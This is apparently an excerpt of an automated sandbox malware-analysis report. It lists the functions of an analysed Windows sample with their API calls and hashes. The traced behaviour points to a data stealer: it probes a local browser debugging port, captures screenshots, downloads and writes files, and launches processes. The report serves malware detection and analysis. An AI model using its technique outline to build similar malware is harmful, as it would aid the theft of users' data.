                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 13140697-3278919252
                                  • Opcode ID: 9c71d9bec0f5464eb09fd42a15255bb2e23c310b92b8f1eaef3a7eabca4ef3bd
                                  • Instruction ID: 4a54a7f0f2dfd8e08195b667c95dc7fbcd6f116733dd865b3c5414ca8ae58aab
                                  • Opcode Fuzzy Hash: 9c71d9bec0f5464eb09fd42a15255bb2e23c310b92b8f1eaef3a7eabca4ef3bd
                                  • Instruction Fuzzy Hash: 14915C72D002089FCB24DFD4D9849EEB7BAFB48314F18856AE609AB305D735AE41DF91
                                  Function 00FB90C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetOpenA.WININET(00FDCFEC,00000001,00000000,00000000,00000000), ref: 00FB90DF
                                  • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00FB90FC
                                  • InternetCloseHandle.WININET(00000000), ref: 00FB9109
                                  • InternetReadFile.WININET(?,?,?,00000000), ref: 00FB9166
                                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00FB9197
                                  • InternetCloseHandle.WININET(00000000), ref: 00FB91A2
                                  • InternetCloseHandle.WININET(00000000), ref: 00FB91A9
                                  • strlen.MSVCRT ref: 00FB91BA
                                  • strlen.MSVCRT ref: 00FB91ED
                                  • strlen.MSVCRT ref: 00FB922E
                                  • strlen.MSVCRT ref: 00FB924C
                                    • Part of subcall function 00FB8980: std::_Xinvalid_argument.LIBCPMT ref: 00FB8996
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                  • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                  • API String ID: 1530259920-2144369209
                                  • Opcode ID: 037e127023b8d7dea2eac47a3a6059e11f0928478291ba9ef6e06586bd6fdeeb
                                  • Instruction ID: 62e1baed109780cc9513cbd07596d9ed8930bc0a3367c22f05e08df385714394
                                  • Opcode Fuzzy Hash: 037e127023b8d7dea2eac47a3a6059e11f0928478291ba9ef6e06586bd6fdeeb
                                  • Instruction Fuzzy Hash: C951B671A00205ABDB20DBE9DC45FDEB7FEDB84710F140069F504E7281DBB5E944ABA6
                                  Function 00FD1660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 00FD16A1
                                  • lstrcpy.KERNEL32(00000000,01B8B7E8), ref: 00FD16CC
                                  • lstrlen.KERNEL32(?), ref: 00FD16D9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD16F6
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FD1704
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD172A
                                  • lstrlen.KERNEL32(01B9AA70), ref: 00FD173F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FD1762
                                  • lstrcat.KERNEL32(00000000,01B9AA70), ref: 00FD176A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD1792
                                  • ShellExecuteEx.SHELL32(?), ref: 00FD17CD
                                  • ExitProcess.KERNEL32 ref: 00FD1803
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                  • String ID: <
                                  • API String ID: 3579039295-4251816714
                                  • Opcode ID: 9d674171a6e54bd7fd0a022b916179a21cbafc30b550b8fb3913d7f2703dcc66
                                  • Instruction ID: 9e3940ec831765892062f4b26d3b7e9456ead1b50e09dc5635ae0a0d401050c6
                                  • Opcode Fuzzy Hash: 9d674171a6e54bd7fd0a022b916179a21cbafc30b550b8fb3913d7f2703dcc66
                                  • Instruction Fuzzy Hash: 61519E70D01219ABDB65EFE5C884A9EBBFABF44310F044036A515E7344DB34AE41EB90
                                  Function 00FCEFB0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCEFE4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCF012
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FCF026
                                  • lstrlen.KERNEL32(00000000), ref: 00FCF035
                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 00FCF053
                                  • StrStrA.SHLWAPI(00000000,?), ref: 00FCF081
                                  • lstrlen.KERNEL32(?), ref: 00FCF094
                                  • lstrlen.KERNEL32(00000000), ref: 00FCF0B2
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 00FCF0FF
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 00FCF13F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$AllocLocal
                                  • String ID: ERROR
                                  • API String ID: 1803462166-2861137601
                                  • Opcode ID: ce3a9fdea184a5be80f90cafb2312d9ab2a608451c616d7566ec7ddff9bbfd1b
                                  • Instruction ID: a298794e379c6a517241c052276bb0f97313bcc8cd3292dc7b5720b1233bd82c
                                  • Opcode Fuzzy Hash: ce3a9fdea184a5be80f90cafb2312d9ab2a608451c616d7566ec7ddff9bbfd1b
                                  • Instruction Fuzzy Hash: FE5180319101469FCB31AFB5DD4AFAAB7E9AF41720F05406CE8499B206DB38DC05AB91
                                  Function 00FBA010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetEnvironmentVariableA.KERNEL32(01B98F38,011E9BD8,0000FFFF), ref: 00FBA026
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBA053
                                  • lstrlen.KERNEL32(011E9BD8), ref: 00FBA060
                                  • lstrcpy.KERNEL32(00000000,011E9BD8), ref: 00FBA08A
                                  • lstrlen.KERNEL32(00FE4C4C), ref: 00FBA095
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBA0B2
                                  • lstrcat.KERNEL32(00000000,00FE4C4C), ref: 00FBA0BE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBA0E4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBA0EF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBA114
                                  • SetEnvironmentVariableA.KERNEL32(01B98F38,00000000), ref: 00FBA12F
                                  • LoadLibraryA.KERNEL32(01B9D790), ref: 00FBA143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                  • String ID:
                                  • API String ID: 2929475105-0
                                  • Opcode ID: 13758cb80f883d8b0d29ae9bc75cd19a6df2b0a3a2974a5fdbea0c127cecaf9b
                                  • Instruction ID: 57e9276e65f43e9625f04a3b377e806672662dbaf0486aca2199a91abf42629f
                                  • Opcode Fuzzy Hash: 13758cb80f883d8b0d29ae9bc75cd19a6df2b0a3a2974a5fdbea0c127cecaf9b
                                  • Instruction Fuzzy Hash: 5291D431E00A148FD735AFEADC84AE637F5EB94724F444068E5258B245EB79DC80EF92
                                  Function 00FCC840 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FCC8A2
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FCC8D1
                                  • lstrlen.KERNEL32(00000000), ref: 00FCC8FC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCC932
                                  • StrCmpCA.SHLWAPI(00000000,00FE4C3C), ref: 00FCC943
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: a2b8d61563e7d2e73a8ea2a9086999de9d370499f7d3536ee23a694c5aa20e29
                                  • Instruction ID: 573895b1b5ed96426df3734f05b62a8d58a95f6731271f6d7b7ba17179856278
                                  • Opcode Fuzzy Hash: a2b8d61563e7d2e73a8ea2a9086999de9d370499f7d3536ee23a694c5aa20e29
                                  • Instruction Fuzzy Hash: F761B071D1121A9BDB20EFB6894AFEE7BF9AF05314F04006DE849E7241D738D945ABE0
                                  Function 00FD41E0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00FD0CF0), ref: 00FD4276
                                  • GetDesktopWindow.USER32 ref: 00FD4280
                                  • GetWindowRect.USER32(00000000,?), ref: 00FD428D
                                  • SelectObject.GDI32(00000000,00000000), ref: 00FD42BF
                                  • GetHGlobalFromStream.COMBASE(00FD0CF0,?), ref: 00FD4336
                                  • GlobalLock.KERNEL32(?), ref: 00FD4340
                                  • GlobalSize.KERNEL32(?), ref: 00FD434D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                  • String ID:
                                  • API String ID: 1264946473-0
                                  • Opcode ID: 62d11c46f7d200e335b9b0439a7f5c759fbe8620e6224d9554dbc3f097c8ab99
                                  • Instruction ID: 65bd6d468fbad9985c60578b2a58eb92eee7d11479455e244b01f1e907dc10e3
                                  • Opcode Fuzzy Hash: 62d11c46f7d200e335b9b0439a7f5c759fbe8620e6224d9554dbc3f097c8ab99
                                  • Instruction Fuzzy Hash: 11514E75A10208AFDB24EFE4DC85AEEBBBDEF48314F104129F915A7244DB34AD41DBA1
                                  Function 00FCDFA0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcat.KERNEL32(?,01B9E0B8), ref: 00FCE00D
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00FCE037
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCE06F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00FCE07D
                                  • lstrcat.KERNEL32(?,?), ref: 00FCE098
                                  • lstrcat.KERNEL32(?,?), ref: 00FCE0AC
                                  • lstrcat.KERNEL32(?,01B8B838), ref: 00FCE0C0
                                  • lstrcat.KERNEL32(?,?), ref: 00FCE0D4
                                  • lstrcat.KERNEL32(?,01B9D830), ref: 00FCE0E7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCE11F
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00FCE126
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 4230089145-0
                                  • Opcode ID: f4db776061db81536b229c67e404da1aebb3375512cc0ade520ad5984c01878e
                                  • Instruction ID: f9ece9e0cdbbbbc407218a5350500dffe79bfb66607d66384975e988bef8188f
                                  • Opcode Fuzzy Hash: f4db776061db81536b229c67e404da1aebb3375512cc0ade520ad5984c01878e
                                  • Instruction Fuzzy Hash: 7A61BF71D1011CABCB65EFA4CD45BDDB7F8BF88300F1449A8A60AA7240DB749F85AF90
                                  Function 00FB6AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB6AFF
                                  • InternetOpenA.WININET(00FDCFEC,00000001,00000000,00000000,00000000), ref: 00FB6B2C
                                  • StrCmpCA.SHLWAPI(?,01B9E968), ref: 00FB6B4A
                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00FB6B6A
                                  • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00FB6B88
                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00FB6BA1
                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00FB6BC6
                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00FB6BF0
                                  • CloseHandle.KERNEL32(00000000), ref: 00FB6C10
                                  • InternetCloseHandle.WININET(00000000), ref: 00FB6C17
                                  • InternetCloseHandle.WININET(?), ref: 00FB6C21
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                  • String ID:
                                  • API String ID: 2500263513-0
                                  • Opcode ID: caf4655862713f299bf8a9a19162fd00cd9038d12e23415a4dc090c2bda261a9
                                  • Instruction ID: 35648eaf4a96066dfd515622414d8df32136b8912cc312ad16cd08bbfb12888f
                                  • Opcode Fuzzy Hash: caf4655862713f299bf8a9a19162fd00cd9038d12e23415a4dc090c2bda261a9
                                  • Instruction Fuzzy Hash: AD4192B1A00209ABDB24DFA5DC85FEE77BCEB44715F008464FA05EB280DB74AD409FA4
                                  Function 00FD5EE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
